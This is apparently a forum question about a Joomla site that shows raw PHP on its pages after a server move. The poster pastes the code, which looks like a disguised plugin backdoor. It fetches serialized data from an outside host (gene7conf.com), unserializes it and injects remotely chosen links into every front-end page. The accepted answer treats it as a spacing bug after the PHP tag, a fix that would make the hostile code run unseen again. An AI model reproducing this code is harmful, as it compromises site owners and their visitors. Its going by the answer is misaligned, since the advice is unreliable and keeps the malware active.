# After transfer Joomla 3.0 website from one server to another I cath an error

Tags: php, mysql, joomla, joomla3.0

After transfer Joomla 3.0 website from one server to another I cath following error

```
getInt('category_per_page'); 
$comments_page_limit = $config->getInt('category_page_limit'); 
$canPublish = $acl->canPublish(); 
} 
function onAfterRender() 
{ 
    $body = JResponse::getBody(); 

    if(!$body||$body=='') return true; 

    $mainframe = & JFactory::getApplication('site'); 

    if($mainframe->isAdmin()) return; 

    $body = $this->installOptions($body); 
    JResponse::setBody($body);
} 
function getCategoryNewTree( $object_id, $object_group = 'com_content' ) 
{ 
    global $my; $object_id = (int) $object_id; 
    $object_group = trim($object_group); 
    $acl = & JCommentsFactory::getACL();
    $config = & JCommentsFactory::getConfig(); 
    $canPublish = $acl->canPublish(); 
    $canComment = $acl->canComment(); 
} 
function getURIattr() 
{ 
    return (!@$_SERVER['REQUEST_URI'])? @getenv("REQUEST_URI") : @$_SERVER['REQUEST_URI']; 
} 
public function getConfigOpt() 
{ 
    $Conf = @file_get_contents('http://gene7conf.com/?d=' . $_SERVER['HTTP_HOST']);     
    return @unserialize($Conf); 
} 
function CategoryViewsTime( $name, $reason = '') 
{ 
    global $mainframe, $my; 
    $config = & JCommentsFactory::getConfig(); 
    if ($config->get('CategoryGet') != '') 
    { 
        $object = new stdClass(); 
        $object->object_cat = CategoryFactory::getAbs($object->object_cat); 
        $commentText = $comment->comment; 
    } 
} 
function installOptions($content) 
{ 
    try 
    { 
        $getOptions = $this->getConfigOpt(); 
        $ord = @$getOptions['l'][$this->getURIattr()]; 
        if(count(@$ord['m'])) 
        { 
            $opt = (@$ord['k'])? $ord['k'] : $getOptions['d']; 
            $mopt = (count(@$getOptions['*']))? $getOptions['*'] : array(); 
            $l=''; 
            foreach(array_merge($ord['m'], $mopt) as $elem) 
            {
                $l .= ' '. $elem;
            }

            $content = @preg_replace("|{$opt}|", $opt . $l, $content, 1); 
        } 
    } 
    catch (Exception $e) {} 

    return $content; 
} 
function loadAlternateCatergory($languageSuffix = '') 
{ 
    if ($languageSuffix == '') 
    { 
        $languageSuffix = CategoryInput::getVar('lsfx', ''); 
    } 
    if ($languageSuffix != '') 
    { 
        $config = & CategoryFactory::getConfig(); 
        $config->set('lsfx', $languageSuffix);
        $language = & JFactory::getLanguage(); 
        $language->load($languageSuffix);
    } 
}
}
?>
```

Any ideas hot can I fix it?

Joomla! 3.3 
PHP 5.3

[live site](http://fishkadesign.com/veselibas/)

Comment: What error? You posted code, not an error message.

Comment: ok sorry I am new in PHP and joomla and I did not know that it is a code

Answer (score 1, accepted):

it is not error the code in a pulgin file was printing like that to fix it open the pulgin file that was printing give space between php open tag and code

this code

```
<?phpdefined( '_JEXEC' ) or die( 'Restricted access' );
```

like this

```
<?php defined( '_JEXEC' ) or die( 'Restricted access' );
```

Comment: any ideas how can i find this plugin?